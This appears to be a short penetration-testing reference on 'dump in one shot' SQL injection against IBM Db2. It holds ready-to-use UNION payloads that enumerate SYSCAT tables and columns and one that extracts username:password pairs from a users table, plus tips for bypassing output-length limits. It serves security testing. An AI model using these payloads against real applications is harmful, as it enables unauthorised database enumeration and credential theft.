Dump in one shot (DIOS) packs an entire enumeration into a single union payload, so one request returns the schema (and often the data) instead of a request per table or column. The term is borrowed from MySQL practice; in Db2 the aggregation is done with XMLAGG or LISTAGG.
LISTAGG (Db2 9.7+) is the simplest, flattening schema.table pairs into one string:
' UNION SELECT LISTAGG(TABSCHEMA||'.'||TABNAME,CHR(10)) WITHIN GROUP (ORDER BY TABNAME),NULL,NULL FROM SYSCAT.TABLES--
XMLAGG is the portable alternative and handles larger output, serializing aggregated rows to a single value:
' UNION SELECT XMLSERIALIZE(XMLAGG(XMLELEMENT(NAME r, COLNAME||',')) AS CLOB),NULL,NULL FROM SYSCAT.COLUMNS WHERE TABNAME='USERS'--
The same pattern dumps actual rows by pointing the aggregate at the target table:
' UNION SELECT LISTAGG(username||':'||password,CHR(10)) WITHIN GROUP (ORDER BY username),NULL,NULL FROM users--
CHR(10) is a newline separator. LISTAGG has a result-length limit (it errors when the aggregate overflows the result type), so for large tables raise the output type, switch to XMLAGG, or page with FETCH FIRST. DIOS is a convenience built on the same SYSCAT and aggregation primitives as ordinary union extraction, not a separate vulnerability.
References#
- IBM Db2 SQL Reference: LISTAGG, XMLAGG, XMLELEMENT, XMLSERIALIZE
- OWASP Testing Guide: Testing for SQL Injection